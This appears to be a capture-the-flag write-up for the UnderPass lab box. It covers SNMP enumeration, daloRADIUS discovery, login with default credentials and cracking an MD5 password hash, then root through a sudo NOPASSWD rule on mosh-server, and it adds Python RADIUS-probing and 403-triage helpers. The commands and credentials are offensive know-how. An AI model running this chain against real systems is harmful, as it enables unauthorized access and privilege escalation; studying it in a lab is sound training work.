
UnderPass

Enumeration

Nmap scan of the target:

$ nmap -sV -sC -PN -p- -oA underpass_nmap 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 16:39 CEST
Nmap scan report for 10.10.11.48
Host is up (0.047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Repeated the same for common UDP ports and found an SNMP server running on port 161:

$ sudo nmap -sV -sC -PN -sU -p 53,69,161,162,10161,10162,623 10.10.11.48
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 16:41 CEST
Nmap scan report for 10.10.11.48
Host is up (0.029s latency).

PORT      STATE  SERVICE       VERSION
53/udp    closed domain
69/udp    closed tftp
161/udp   open   snmp          SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: c7ad5c4856d1cf6600000000
|   snmpEngineBoots: 31
|_  snmpEngineTime: 3m26s
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_  System uptime: 3m26.53s (20653 timeticks)
162/udp   closed snmptrap
623/udp   closed asf-rmcp
10161/udp closed snmpdtls
10162/udp closed snmpdtls-trap
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!

The web server on port 80 doesn't appear to be configured and only presents the default Apache2 page:

[Screenshot: Apache2 Ubuntu default page ("It works")]

Attempted to fuzz the site with FFuF to uncover any unexpected files or directories, but found none.

False positive

Any path ending in .phps is reported as an HTTP 403. For instance, wp-forum.phps shows up as a hit in the web root:

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://underpass.htb/FUZZ
...
wp-forum.phps           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 25ms]
...

Requesting the URL in a browser also returns an HTTP 403. With no other trace of WordPress on the host, this is a false positive: the PHP module configuration that Ubuntu ships for Apache denies access to every .phps request (raw PHP source), whether or not such a file exists, so the 403 says nothing about the file's existence.

The SNMP service can be enumerated using snmpwalk:

$ snmpwalk -v2c -c public underpass.htb
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (311329) 0:51:53.29
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
...

The SNMP tree on the host is small, and the lines above are more or less the only ones of interest. The sysName value (iso.3.6.1.2.1.1.5.0) looks cryptic but contains two useful details:

  • The capitalized letters in the domain name spell out the acronym UDP.
  • "the only daloradius server" hints at a daloRADIUS instance on the host.

RADIUS is an AAA protocol carried over UDP: authentication on 1812/UDP and accounting on 1813/UDP:

$ nc -vu underpass.htb 1812
Connection to underpass.htb (10.10.11.48) 1812 port [udp/radius] succeeded!
$ nc -vu underpass.htb 1813
Connection to underpass.htb (10.10.11.48) 1813 port [udp/radius-acct] succeeded!

Note that nc reports a UDP "connection" as succeeded as soon as the local socket is connected, so this output on its own is weak evidence (a closed port only shows up as an ICMP port unreachable, which nc -u does not necessarily surface). Combined with the SNMP sysName, though, the target very likely is a RADIUS server.
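A more convincing probe than netcat is a real protocol exchange: send a RADIUS Access-Request and see whether an Access-Accept, Access-Reject or nothing at all comes back. The following builder/parser is an added example and not part of the original writeup; the shared secret `testing123`, the NAS address and the credentials are assumptions used only for illustration (a server that does not know your IP or secret will normally drop the packet silently, so silence is not proof the port is closed).

```python
"""RADIUS Access-Request builder/parser (RFC 2865, plus the RFC 2869
Message-Authenticator that hardened servers now require). Added example for
probing a suspected RADIUS server; not part of the original walkthrough. The
shared secret, NAS address and credentials are illustrative assumptions."""
import hashlib
import hmac
import os
import socket
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT, ACCESS_CHALLENGE = 1, 2, 3, 11
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS, MESSAGE_AUTHENTICATOR = 1, 2, 4, 80


def pap_hide(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 5.2: NUL-pad to a 16-byte multiple (minimum 16), then XOR each
    block with MD5(secret + previous ciphertext block), seeded by the Request
    Authenticator. This is obfuscation keyed on the shared secret, not encryption."""
    padded = password.ljust(max(16, -(-len(password) // 16) * 16), b"\x00")
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        chunk = bytes(a ^ b for a, b in zip(padded[i:i + 16], hashlib.md5(secret + prev).digest()))
        out, prev = out + chunk, chunk
    return out


def pap_reveal(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Inverse of pap_hide: what the server does with the shared secret."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        out += bytes(a ^ b for a, b in zip(hidden[i:i + 16], hashlib.md5(secret + prev).digest()))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def attr(kind: int, value: bytes) -> bytes:
    """Type-Length-Value attribute; Length covers the 2-byte header."""
    return struct.pack("!BB", kind, 2 + len(value)) + value


def build_access_request(ident, secret, username, password, authenticator=None, nas_ip="127.0.0.1"):
    authenticator = authenticator or os.urandom(16)
    attrs = (attr(USER_NAME, username.encode())
             + attr(USER_PASSWORD, pap_hide(password.encode(), secret, authenticator))
             + attr(NAS_IP_ADDRESS, socket.inet_aton(nas_ip))
             + attr(MESSAGE_AUTHENTICATOR, bytes(16)))  # placeholder, filled in below
    packet = struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs)) + authenticator + attrs
    # Message-Authenticator = HMAC-MD5(secret, whole packet with the MA value zeroed).
    # It is the last attribute here, so the final 16 bytes are the placeholder.
    return packet[:-16] + hmac.new(secret, packet, hashlib.md5).digest()


def parse_packet(data: bytes):
    """Return (code, id, authenticator, [(type, value), ...]); reject malformed input."""
    if len(data) < 20:
        raise ValueError("short packet")
    code, ident, length = struct.unpack("!BBH", data[:4])
    if length != len(data):
        raise ValueError("length field does not match datagram")
    attrs, pos = [], 20
    while pos < length:
        if pos + 2 > length or data[pos + 1] < 2 or pos + data[pos + 1] > length:
            raise ValueError("malformed attribute")
        attrs.append((data[pos], data[pos + 2:pos + data[pos + 1]]))
        pos += data[pos + 1]
    return code, ident, data[4:20], attrs


def message_authenticator_ok(packet: bytes, secret: bytes) -> bool:
    """Recompute HMAC-MD5 over the packet with attribute 80 zeroed out."""
    parse_packet(packet)  # raises on malformed input before we index into it
    zeroed, pos, mac = bytearray(packet), 20, None
    while pos < len(packet):
        kind, length = packet[pos], packet[pos + 1]
        if kind == MESSAGE_AUTHENTICATOR and length == 18:
            mac = packet[pos + 2:pos + 18]
            zeroed[pos + 2:pos + 18] = bytes(16)
        pos += length
    return mac is not None and hmac.compare_digest(hmac.new(secret, bytes(zeroed), hashlib.md5).digest(), mac)


def build_response(code: int, request: bytes, secret: bytes, attrs: bytes = b"") -> bytes:
    """Server side, used here only to simulate a reply. RFC 2865 section 3:
    Response Authenticator = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    _, ident, request_auth, _ = parse_packet(request)
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return header + hashlib.md5(header + request_auth + attrs + secret).digest() + attrs


def response_is_authentic(request_auth: bytes, response: bytes, secret: bytes) -> bool:
    """Client side: a reply whose authenticator does not verify was not produced
    with our shared secret (spoofed, or we guessed the secret wrong)."""
    expected = hashlib.md5(response[:4] + request_auth + response[20:] + secret).digest()
    return hmac.compare_digest(expected, response[4:20])


def probe(host: str, secret: bytes, username: str, password: str, port: int = 1812, timeout: float = 3.0) -> str:
    """One Access-Request on the wire. 'no-reply' means the server dropped the
    packet (unknown NAS or wrong secret), the normal reaction to a stranger."""
    request = build_access_request(os.urandom(1)[0], secret, username, password)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, (host, port))
        try:
            data, _ = sock.recvfrom(4096)
        except socket.timeout:
            return "no-reply"
    if not response_is_authentic(request[4:20], data, secret):
        return "bad-response-authenticator"
    return {ACCESS_ACCEPT: "accept", ACCESS_REJECT: "reject", ACCESS_CHALLENGE: "challenge"}.get(data[0], f"code-{data[0]}")
```

Usage against the box would be `probe("underpass.htb", b"testing123", "svcMosh", "guess")`; anything other than `no-reply` confirms a RADIUS listener, and a verified `reject` additionally confirms the shared secret. The PAP hiding and the Response Authenticator both rest on MD5 with the shared secret, which is why RADIUS over the open internet (and without Message-Authenticator) is considered weak.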

Taking a somewhat educated guess, the daloRADIUS web application might be running under /daloradius on the web server:

$ curl -L underpass.htb/daloradius
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.52 (Ubuntu) Server at underpass.htb Port 80</address>
</body></html>

A 403 rather than a 404 means the directory exists but Apache refuses to serve an index for it, so there may be files and subdirectories under /daloradius that are readable individually.
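Both 403s on this page needed the same judgement call: the .phps hit was a blanket rule and /daloradius was a real directory. The check that separates the two is to request a random sibling with the same extension and compare. This triage helper is an added example, not part of the original writeup; the target URL is taken from the writeup, and `fetch` is injectable so the logic runs offline (the default does a real HEAD request).

```python
"""Triage 403 hits from content discovery: is the 403 a genuinely restricted
resource, or a blanket server rule keyed on the path's extension (Apache on
Ubuntu denies every *.phps request, existing or not)? Added example, not part
of the original writeup. fetch() is injectable so the logic runs offline; the
default performs a real HEAD request."""
import secrets
import urllib.error
import urllib.request
from typing import Callable, Dict
from urllib.parse import urljoin


def http_status(url: str, timeout: float = 5.0) -> int:
    """HEAD the URL and return the status code, including 4xx/5xx."""
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def control_path(path: str) -> str:
    """Random sibling that shares the hit's directory and extension, e.g.
    'wp-forum.phps' -> '3f9a1c0b7e2d.phps', 'daloradius' -> '8c1d...' (no extension)."""
    dirpart, _, name = path.rpartition("/")
    ext = name[name.rfind("."):] if "." in name[1:] else ""  # '.gitignore' has no extension
    return (dirpart + "/" if dirpart else "") + secrets.token_hex(6) + ext


def triage_403(base: str, path: str, fetch: Callable[[str], int] = http_status) -> Dict[str, object]:
    """Verdicts:
      not-403        the hit is not a 403 at all (status recorded)
      extension-rule a random name with the same extension is also 403, so the
                     status says nothing about whether this file exists
      genuine        the random sibling gets a different status (normally 404),
                     so the 403 is specific to this path and it most likely exists"""
    status = fetch(urljoin(base, path))
    result = {"path": path, "status": status, "control": None, "control_status": None}
    if status != 403:
        result["verdict"] = "not-403"
        return result
    control = control_path(path)
    control_status = fetch(urljoin(base, control))
    result.update(control=control, control_status=control_status,
                  verdict="extension-rule" if control_status == 403 else "genuine")
    return result


def triage_all(base: str, paths, fetch: Callable[[str], int] = http_status) -> Dict[str, str]:
    """Run the check over every 403 from a fuzzing run; returns {path: verdict}."""
    return {p: triage_403(base, p, fetch)["verdict"] for p in paths}


if __name__ == "__main__":
    import sys
    # usage: triage.py http://underpass.htb/ wp-forum.phps daloradius
    for hit in sys.argv[2:]:
        print(triage_403(sys.argv[1], hit))
```

Feed it the 403 lines from the ffuf output; anything marked `extension-rule` can be dropped from the to-do list, while `genuine` entries deserve a second fuzzing pass underneath them, exactly as happened with /daloradius.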

Used FFuF to discover additional files and directories under /daloradius:

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://underpass.htb/daloradius/FUZZ
...
.gitignore              [Status: 200, Size: 221, Words: 1, Lines: 13, Duration: 26ms]
ChangeLog               [Status: 200, Size: 24703, Words: 3653, Lines: 413, Duration: 26ms]

The .gitignore suggests that /daloradius is a cloned Git repository. Which repository is clear from ChangeLog, whose contents match the ChangeLog file from the official daloRADIUS repository exactly:

[Screenshot: ChangeLog served from /daloradius/ChangeLog, identical to the upstream daloRADIUS ChangeLog]

Using the daloRADIUS repository as a guide, there should be two separate login frontends for users and operators. Of course, the operator login is the more interesting one of the two:

[Screenshot: daloRADIUS operator login page]

Foothold

The default credentials (administrator:radius) from the daloRADIUS documentation are valid for logging in to the daloRADIUS web UI:

[Screenshot: daloRADIUS dashboard after logging in as administrator]

The dashboard lists a single user, svcMosh, whose password is stored as an MD5 hash:

[Screenshot: daloRADIUS user list showing svcMosh and the MD5 password hash]

Cracked the hash using Hashcat in mode 0 (raw MD5):

$ hashcat -m 0 svcmosh.hash ~/tools/wordlists/rockyou.txt
...
412dd4759978acfcc81deab01b382403:underwaterfriends

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 412dd4759978acfcc81deab01b382403
Time.Started.....: Sat May 10 19:10:12 2025 (1 sec)
Time.Estimated...: Sat May 10 19:10:13 2025 (0 secs)
...

User svcMosh appears to be a system user account and the credentials (svcMosh:underwaterfriends) are valid for logging in over SSH:

svcMosh@underpass:~$ id
uid=1002(svcMosh) gid=1002(svcMosh) groups=1002(svcMosh)

Got the user flag.

Privilege Escalation

User svcMosh has a Sudo NOPASSWD privilege on /usr/bin/mosh-server:

svcMosh@underpass:~$ sudo -l
...
User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

mosh-server is the server side of Mosh, a roaming-friendly remote terminal that runs over UDP.

When executed, mosh-server binds a high-numbered UDP port (60001 upward by default), prints a one-time session key, detaches, and spawns the invoking user's shell inside that session. None of this needs root, but under sudo the invoking user is root, so the shell it spawns is a root shell, and whoever holds the printed key can attach to it. Because the key is printed straight to the terminal of the user who ran sudo, the NOPASSWD rule hands root to svcMosh.

The technique is straightforward: stand up a mosh-server instance as root, then use mosh-client with that key to attach to it over localhost:

svcMosh@underpass:~$ sudo /usr/bin/mosh-server new


MOSH CONNECT 60001 NVNlc0zGj9E0A1tkegix4A

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
...

[mosh-server detached, pid = 2722]
svcMosh@underpass:~$ MOSH_KEY=NVNlc0zGj9E0A1tkegix4A mosh-client 127.0.0.1 60001
mosh-client (mosh 1.3.2) [build mosh 1.3.2]
...
root@underpass:~# id
uid=0(root) gid=0(root) groups=0(root)

Got the root flag.